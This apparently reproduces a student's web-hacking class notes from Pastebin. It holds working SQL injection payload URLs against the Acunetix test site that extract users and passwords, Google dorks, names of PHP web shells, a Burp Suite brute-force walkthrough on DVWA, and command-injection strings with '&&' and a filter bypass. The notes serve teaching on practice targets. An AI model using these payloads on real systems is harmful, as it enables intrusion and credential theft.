Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 1. Error Based Injection
- 2. ---------------------
- 3. Error Based Injection is a part of SQL Injection attacks series in which we will try to exploit web applications designed in ASP or ASPX and running on IIS Server with MS-SQL Database systems.
- 4.
- 5. Problems in Error Based Injection
- 6. ---------------------------------
- 7. 1. Like PHP hacking into ASP and ASPX sites needs a different ball game as the database queries are pretty different in MS SQL as compare to MySQL.
- 8. 2. Database() and Version() will not be executed on the MSSQL.
- 9. 3. Order by clause will not work on MS-SQL.
- 10. 4. Union will also not work.
- 11. 5. It works on LIFO(Last in First Out) rule, i.e you cannot get the entire table list from information_Schema.tables hence you have to get one table at a time.
- 12.
- 13. Why it is known as Error Based Injection
- 14. -----------------------------------------
- 15. It means you will get the data in an error.
- 16.
- 17. Target : vulnweb.com : It is practice framework from a company called Acunetix.
- 18.
- 19. It has all MY-SQL and MS-SQL technology attack practices.
- 20.
- 21. Step 1: Get any GET method in the URL of the website. I.e We have to look for any SOmethoing=Something.
- 22. http://testasp.vulnweb.com/showforum.asp?id=0
- 23.
- 24. Step 2: Check the exception handling.
- 25. http://testasp.vulnweb.com/showforum.asp?id=0'
- 26.
- 27. Step 3: Check the conditions required for further attack.
- 28. http://testasp.vulnweb.com/showforum.asp?id=0 and 1=1;
- 29.
- 30. NOte : Error Based Injection works on LIFO rule. Last in First out.
- 31.
- 32. For Example: If we have a database with tables like followings
- 33. threads -> 1
- 34. teacher->2
- 35. classes->3
- 36. fee->4
- 37. users->5
- 38.
- 39. Step 4: http://testasp.vulnweb.com/showforum.asp?id=0 and
- 40. 1=convert(int,(select top 1 table_name from information_schema.tables));
- 41.
- 42. Step 5: Get the next tOp table in teh list
- 43. testasp.vulnweb.com/showforum.asp?id=0 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('threads','users')));
- 44.
- 45. Target Table: Found : users
- 46.
- 47. Step 6: Get the columns of the users table
- 48. testasp.vulnweb.com/showforum.asp?id=0 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users' and column_name not in('uname')));
- 49.
- 50. Column First Found : uname
- 51.
- 52. Step 7 :Get Second Column
- 53. testasp.vulnweb.com/showforum.asp?id=0 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users' and column_name not in ('uname')));
- 54.
- 55. Step 8: Get the uname and upass
- 56. http://testasp.vulnweb.com/showforum.asp?id=0 and 1=convert(int,(select top 1 upass from users));
- 57.
- 58.
- 59.
- 60. Google Dorks
- 61. ------------
- 62. Google Dorks are the techniques of refine searching on Google and other page rank algorithm based search engines. Where we try to refine our searching results with some non traditional approach inputs in search input field.
- 63.
- 64. Three main aspects of any google result.
- 65.
- 66. Green : URL
- 67.
- 68. Black : Content
- 69.
- 70. Blue : Header
- 71.
- 72. inurl : THis doc will concentrate only and only on the URLs available in the indexing circle of Google.
- 73. For Example: inurl:login.asp
- 74.
- 75. Site: This dork will help you to scan only and only the content of the site which you will palce infront of this dork
- 76. For Example: site:lucideus.com
- 77.
- 78. Filetype: This dork will help you to find a particular extension based file or application can be documnet, pdf, executable or video etc.
- 79. For Example: site:pokemon filetype:sql
- 80.
- 81. indexof : This dork will lead to the open directories which host the content on the server uploaded by the admin or the users of the website.
- 82.
- 83. For Example: indexof: download/books/osho/
- 84.
- 85. Source: https://www.exploit-db.com/google-hacking-database/
- 1. Post Parameter Injections:
- 2.
- 3. Post Packet:
- 4.
- 5. Packet which are containing sensitive information, through the back end of the browser, without showing anything in url.
- 6. This information are carried out in POST_DATA form.
- 7.
- 8.
- 9. upload:
- 10.
- 11. CV
- 12. Resume,
- 13. Songs
- 14. Video
- 15.
- 16. PAyment Gateways..
- 17.
- 18. GET:
- 19.
- 20. something =something
- 21.
- 22. ============
- 23.
- 24. Tamper Data:
- 25.
- 26. Firefox - Addon
- 27.
- 28. This is used to capture packets which is flowing towards any server through POST_DATA packets. It works at very end point of browser before data travel toards server.
- 29.
- 30.
- 31. Arbitary File: | Hackers Control Panel
- 32.
- 33. This is well coded file by hacker in such a way that when this got executed over some server once this uploaded, will provide u complete access of that server.
- 34.
- 35. This is also shell file.
- 36. Hacker used this method for defacing websites.
- 37.
- 38. Extreme Acccess
- 39.
- 40. php : C99.php, b374k.php, kikokaka.php, wsoshell.php
- 41. asp
- 1. Brute Forcing:
- 2.
- 3. This is a way of finding credentials for some login/authentication by try permutations and combination of words
- 4.
- 5. Burpsuite:
- 6.
- 7. Portswigger:
- 8.
- 9. Free - Trial 14
- 10.
- 11. Paid: 349 $
- 12.
- 13. This is a java based tool (.jar), to execute, your system should be having java installed. jdk
- 14.
- 15. Username:
- 16. Administrator
- 17. Testing
- 18. hello
- 19. lucideus
- 20. security
- 21. abc
- 22. admin
- 23. palvinder
- 24. hardik
- 25. birthday
- 26. chlaak
- 27.
- 28.
- 29. Password:
- 30. 123
- 31. testing
- 32. admin
- 33. abc123
- 34. hello
- 35. nai
- 36. btana
- 37. password
- 38.
- 39.
- 40. BruteForcing DVWA -> Burp Suite
- 41. ===============================
- 42.
- 43. Step 1: Open Fresh Link Over which u want to brute force:
- 44.
- 45. Step 2: Browser Setting -> Advanced -> Network -> Setting
- 46.
- 47. Step 3: Manual Proxy Conf. -> 127.0.0.1 Port 8080
- 48.
- 49. Note : Remove all detail for "No Proxy for"
- 50.
- 51. Step 4: Open Burpsuite: Proxy -> Intercept -> Intercept is ON
- 52.
- 53. Step 5: DVWA -> Login with Random detail
- 54.
- 55. Step 6: Burpsuite will capture random detai packet
- 56.
- 57. Step 7: Select packet -> right click -> Send to intruder
- 58.
- 59. Step 8: Intercept is OFF
- 60.
- 61. Step 9: Go to intruder -> Position -> Clear
- 62.
- 63. Step 10: select value of username -> Add
- 64.
- 65. Step 11: select value of paassword -> Add
- 66.
- 67. Step 12: Attack Type: Cluster BOMB
- 68.
- 69. Step 13: PAYLOAD -> 1 (Add value to try on Username)
- 70.
- 71. Step 14: PAYLOAD -> 2 (Add value to try on Password)
- 72.
- 73. Step 15: Tab -> Options -> Grep Match -> clear -> add -> Username and/or password incorrect.
- 74.
- 75. Step 16: Start Attack
- 76.
- 77. =============================================
- 78.
- 79. Command Execution Vulnerability:
- 80. -------------------------------
- 81.
- 82. If any site is providing u facility of function like ping, tracert, etc,
- 83. there we can try for such vulnerability, or any cmd function
- 84.
- 85. DVWA: Level - Low
- 86.
- 87. union -> merging two queries
- 88.
- 89. cmd -> &&
- 90.
- 91. ping 172.16.3.2 && ping www.google.com
- 92.
- 93.
- 94. Medium:
- 95.
- 96. && -> Remove
- 97. ; -> Remove
- 98.
- 99. ping 172.16.3.2 &;& ping www.google.com
- 100.
- 101.
- 102. File Execution Vulnerability
- 103. ---------------------------
- 104.
- 105. www.bank.com/video.php?include=www.youtube.com/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement